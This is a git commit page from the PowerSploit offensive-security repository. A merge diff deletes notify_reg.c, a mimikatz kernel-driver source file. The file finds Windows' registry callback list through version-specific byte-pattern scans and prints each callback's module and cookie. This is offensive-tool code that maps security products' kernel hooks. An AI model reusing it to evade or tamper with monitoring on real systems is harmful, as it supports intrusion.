Merge branch 'master' of https://github.com/mattifestation/PowerSploit

Conflicts: Recon/Get-ComputerDetails.ps1 Recon/Recon.psd1
author: clymb3r <bialek.joseph@gmail.com> 2014-04-16 21:02:50 -0700
committer: clymb3r <bialek.joseph@gmail.com> 2014-04-16 21:02:50 -0700
commit: b783b459c12112509a733253df9f5935e104200c (patch)
tree: e58bce1f7d2f2584d1426262cc609f153d774e51 /Exfiltration/mimikatz-1.0/driver/notify_reg.c
parent: 47b90647c11cb4956c735cfa47628dc7dcb03bb6 (diff)
parent: 946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c (diff)
download: PowerSploit-b783b459c12112509a733253df9f5935e104200c.tar.gz
PowerSploit-b783b459c12112509a733253df9f5935e104200c.zip
1 files changed, 0 insertions, 137 deletions
diff --git a/Exfiltration/mimikatz-1.0/driver/notify_reg.c b/Exfiltration/mimikatz-1.0/driver/notify_reg.c
deleted file mode 100644
index 843cfba..0000000
--- a/Exfiltration/mimikatz-1.0/driver/notify_reg.c
+++ /dev/null
@@ -1,137 +0,0 @@
-#include "notify_reg.h"
-
-ULONG * CmpCallBackCount		= NULL;
-PVOID * CmpCallBackVector		= NULL;
-PLIST_ENTRY CallbackListHead	= NULL;
-
-NTSTATUS kListNotifyRegistry(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
-{
-	NTSTATUS status;
-	ULONG i;
-	PKIWI_CALLBACK monCallBack;
-	PLIST_ENTRY maListe;
-	PKIWI_REGISTRY6_CALLBACK monCallBack6;
-
-	*ppszDestEnd = pszDest; *pcbRemaining= cbDest;
-	status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyRegistry\n\n");
-	if(NT_SUCCESS(status))
-	{
-		status = getNotifyRegistryRoutine();
-		if(NT_SUCCESS(status))
-		{
-			if(INDEX_OS < INDEX_VISTA)
-			{
-				for(i = 0; (i < *CmpCallBackCount) && NT_SUCCESS(status) ; i++)
-				{
-					monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(CmpCallBackVector[i]);
-					if(monCallBack != NULL)
-					{
-						status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
-						if(NT_SUCCESS(status))
-						{
-							status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
-							if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
-							{
-								status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
-									L" - cookie %#.I64x\n", *(monCallBack->opt_cookie)
-								);
-							}
-						}
-					}
-				}
-			}
-			else
-			{
-				for(maListe = CallbackListHead->Flink, i = 0; (maListe != CallbackListHead) && NT_SUCCESS(status) ; maListe = maListe->Flink, i++)
-				{
-					monCallBack6 = (PKIWI_REGISTRY6_CALLBACK) (((ULONG_PTR) maListe) + sizeof(LIST_ENTRY) + 2*((INDEX_OS < INDEX_7) ? sizeof(PVOID) : sizeof(ULONG)));
-					status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
-					if(NT_SUCCESS(status))
-					{
-						status = getModuleFromAddr((ULONG_PTR) monCallBack6->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
-						if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
-						{
-							status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION,
-								L" - alt %wZ - cookie %#.I64x\n", &(monCallBack6->altitude), monCallBack6->cookie);
-						}
-					}
-				}
-			}
-		}
-	}
-	return status;
-}
-
-NTSTATUS getNotifyRegistryRoutine()
-{
-	NTSTATUS retour = STATUS_NOT_FOUND;
-	#ifdef _M_X64
-		UCHAR PTRN_WNT5_Vector[]= {0x4c, 0x8d, 0x3d};
-		UCHAR PTRN_WNT5_Count[]	= {0x0f, 0xc1, 0x05};
-		
-		UCHAR PTRN_WN60_Head[]	= {0x48, 0x8b, 0xf0, 0x48};
-		LONG OFFS_WN60_Head		= -9;
-		UCHAR PTRN_WALL_Head[]	= {0x48, 0x8b, 0xf8, 0x48};
-		LONG OFFS_WALL_Head		= -9;
-	#elif defined _M_IX86
-		UCHAR PTRN_WNT5_Vector[]= {0x53, 0x56, 0x57, 0xbb};
-		UCHAR PTRN_WNT5_Count[]	= {0xff, 0xb9};
-		
-		UCHAR PTRN_WN60_Head[]	= {0x8b, 0xcb, 0xe8};
-		LONG OFFS_WN60_Head		= 12;
-		UCHAR PTRN_WN61_Head[]	= {0x8b, 0xc7, 0xe8};
-		LONG OFFS_WN61_Head		= -4;
-		UCHAR PTRN_WIN8_Head[]	= {0x53, 0x8d, 0x55};
-		LONG OFFS_WIN8_Head		= -4;
-	#endif
-	PUCHAR refDebut = (PUCHAR) CmUnRegisterCallback, refFin = refDebut + PAGE_SIZE;
-	PUCHAR pattern = NULL; SIZE_T taille = 0; LONG offsetTo = 0;
-	
-	if((CmpCallBackVector && CmpCallBackCount) || CallbackListHead)
-	{
-		retour = STATUS_SUCCESS;
-	}
-	else
-	{
-		if(INDEX_OS < INDEX_VISTA)	
-		{
-			retour = genericPointerSearch((PUCHAR *) &CmpCallBackVector, refDebut, refFin, PTRN_WNT5_Vector, sizeof(PTRN_WNT5_Vector), sizeof(PTRN_WNT5_Vector));
-			if(NT_SUCCESS(retour))
-			{
-				retour = genericPointerSearch((PUCHAR *) &CmpCallBackCount, refDebut, refFin, PTRN_WNT5_Count, sizeof(PTRN_WNT5_Count), sizeof(PTRN_WNT5_Count));
-			}
-		}
-		else
-		{
-			if(INDEX_OS < INDEX_7)
-			{
-				pattern = PTRN_WN60_Head;
-				taille  = sizeof(PTRN_WN60_Head);
-				offsetTo= OFFS_WN60_Head;
-			}
-			else
-			{
-				#ifdef _M_X64
-					pattern = PTRN_WALL_Head;
-					taille  = sizeof(PTRN_WALL_Head);
-					offsetTo= OFFS_WALL_Head;
-				#elif defined _M_IX86
-					if(INDEX_OS < INDEX_8)
-					{
-						pattern = PTRN_WN61_Head;
-						taille  = sizeof(PTRN_WN61_Head);
-						offsetTo= OFFS_WN61_Head;
-					}
-					else
-					{
-						pattern = PTRN_WIN8_Head;
-						taille  = sizeof(PTRN_WIN8_Head);
-						offsetTo= OFFS_WIN8_Head;
-					}
-				#endif
-			}
-			retour = genericPointerSearch((PUCHAR *) &CallbackListHead, refDebut, refFin, pattern, taille, offsetTo);
-		}
-	}
-	return retour;
-}
author	clymb3r <bialek.joseph@gmail.com>	2014-04-16 21:02:50 -0700
committer	clymb3r <bialek.joseph@gmail.com>	2014-04-16 21:02:50 -0700
commit	b783b459c12112509a733253df9f5935e104200c (patch)
tree	e58bce1f7d2f2584d1426262cc609f153d774e51 /Exfiltration/mimikatz-1.0/driver/notify_reg.c
parent	47b90647c11cb4956c735cfa47628dc7dcb03bb6 (diff)
parent	946328cf9e6d6c60eca2bb9d71a38e210c1c3b6c (diff)
download	PowerSploit-b783b459c12112509a733253df9f5935e104200c.tar.gz PowerSploit-b783b459c12112509a733253df9f5935e104200c.zip